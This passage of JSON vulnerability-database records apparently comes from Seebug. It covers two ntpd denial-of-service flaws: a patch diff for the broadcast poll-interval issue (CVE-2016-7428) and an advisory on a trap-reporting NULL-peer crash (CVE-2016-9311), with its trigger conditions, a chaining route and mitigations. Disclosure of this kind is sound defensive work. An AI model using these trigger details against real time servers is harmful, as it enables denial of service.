a/include/ntp.h\r\n+++ b/include/ntp.h\r\n@@ -383,7 +383,9 @@ struct peer {\r\n * Statistic counters\r\n */\r\n u_long timereset; /* time stat counters were reset */\r\n- u_long timelastrec; /* last packet received time */\r\n+ u_long timelastrec; /* last packet received time (may\r\n+ * include spoofed, replayed, or other\r\n+ * invalid packets) */\r\n u_long timereceived; /* last (clean) packet received time */\r\n u_long timereachable; /* last reachable/unreachable time */\r\n\r\ndiff --git a/ntpd/ntp_proto.c b/ntpd/ntp_proto.c\r\nindex ad45409..1ea5cee 100644\r\n--- a/ntpd/ntp_proto.c\r\n+++ b/ntpd/ntp_proto.c\r\n@@ -1338,11 +1338,20 @@ receive(\r\n ++bail;\r\n }\r\n\r\n- if ( (current_time - peer->timelastrec)\r\n+ /*\r\n+ * Ensure that at least one poll interval has\r\n+ * elapsed since the last **clean** packet was\r\n+ * received. We limit the check to **clean**\r\n+ * packets to prevent replayed packets and\r\n+ * incorrectly authenticated packets, which\r\n+ * we'll discard, from being used to create a\r\n+ * denial of service condition.\r\n+ */\r\n+ if ( (current_time - peer->timereceived)\r\n < (1 << pkt->ppoll)) {\r\n msyslog(LOG_INFO, \"receive: broadcast packet from %s arrived after %ld, not %d seconds!\",\r\n stoa(&rbufp->recv_srcadr),\r\n- (current_time - peer->timelastrec),\r\n+ (current_time - peer->timereceived),\r\n (1 << pkt->ppoll)\r\n );\r\n ++bail;\r\n--\r\n2.5.2\r\n```\r\n\r\n### Timeline\r\n* 2016-09-12 - Vendor Disclosure\r\n* 2016-11-21 - Public Release", "published": "2017-10-11T00:00:00", "type": "seebug", "title": "Network Time Protocol Broadcast Mode Poll Interval Enforcement Denial of Service Vulnerability(CVE-2016-7428)", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7973", "CVE-2016-7428"], "modified": "2017-10-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96648", "id": "SSV:96648", "sourceData": "", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T11:56:52", "description": "### Summary\r\nAn exploitable denial of service vulnerability exists in the trap functionality of ntpd. If an ntpd instance is configured to send traps, a specially crafted network packet can be used to cause a null pointer dereference resulting in a denial of service. This vulnerability can be triggered by a remote unauthenticated attacker.\r\n\r\n### Tested Versions\r\n* NTP 4.2.8p8\r\n* NTPsec 0.9.3\r\n\r\n### Product URLs\r\n* http://www.ntp.org\r\n* http://www.ntpsec.org/\r\n\r\n### CVSS Scores\r\nCVSSv2: 7.1 - (AV:N/AC:M/Au:N/C:N/I:N/A:C)\r\nCVSSv3: 5.9 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H\r\n\r\n### Details\r\nWhen reporting traps, the ntpd reportevent(err, peer, str) function asserts that peer != NULL if err is a \"peer event\". Thus if reportevent() can be called with NULL peer parameter, ntpd will abort() causing a DoS condition.\r\n\r\nntp-4.2.8p7 introduced a variety of validity checks on crypto-NAK packets to address the nak-dos vulnerability (CVE-2016-1547). When any of these validity checks fail, ntpd reports an event to any trap receivers with: reportevent(PEVNTAUTH, peer, \"Invalid_NAK\").\r\n\r\nIf the source address and mode of the incoming crypto-NAK packet do not correspond to an existing peer, the peer argument will be NULL causing the INSIST(peer != NULL) assertion to fail when report_event() attempts to report the event to its trap recipients.\r\n\r\nIt may also be possible to trigger reporting of a peer event without a valid peer on other code paths. For example, checkleapsec() in ntptimer.c calls:\r\n```\r\nreport_event(PEVNT_ARMED, sys_peer, NULL);\r\n```\r\n\r\nIf ntpd's syspeer advertises a leap second and then the host running ntpd becomes temporarily disconnected, it may be possible for checkleapsec() to be called without a valid sys_peer leading to the assertion failure above.\r\n\r\nThis crash can be reliably triggered on ntp-4.2.8p8. We are reporting this defect against NTPsec 0.9.3 as well because it contains the same incorrect logic in reportevent(). However we did not attempt to exploit this vulnerability on NTPsec because triggering a call to reportevent() with a NULL peer is not as straightforward as with ntp-4.2.8p8.\r\n\r\nThe fix for CRYPTO_NAK crash (CVE-2016-4957) introduced in ntp-4.2.8p8 does not address this vulnerability.\r\n\r\nThough traps are not configured in most common NTP environments, attackers can employ \"Network Time Protocol Control Mode Unauthenticated Trap Information Disclosure and DDoS Amplification Vulnerability\" (TALOS-2016-0203) in order to configure a trap in order to exploit this vulnerability.\r\n\r\n### Mitigation\r\nSuccessful exploitation of this vulnerability requires ntpd to be configured with trap recipients. Systems can be protected by removing all \"trap\" commands from ntp.conf and adopting the mitigations for \"Network Time Protocol Control Mode Unauthenticated Trap Information Disclosure and DDoS Amplification Vulnerability\" (TALOS-2016-0203).\r\n\r\n### Timeline\r\n* 2016-09-20 - Vendor Disclosure\r\n* 2016-11-21 - Public Release", "published": "2017-10-11T00:00:00", "type": "seebug", "title": "Network Time Protocol Trap Crash Denial of Service Vulnerability(CVE-2016-9311)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-1547", "CVE-2016-4957", "CVE-2016-9311"], "modified": "2017-10-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96649", "id": "SSV:96649", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}]}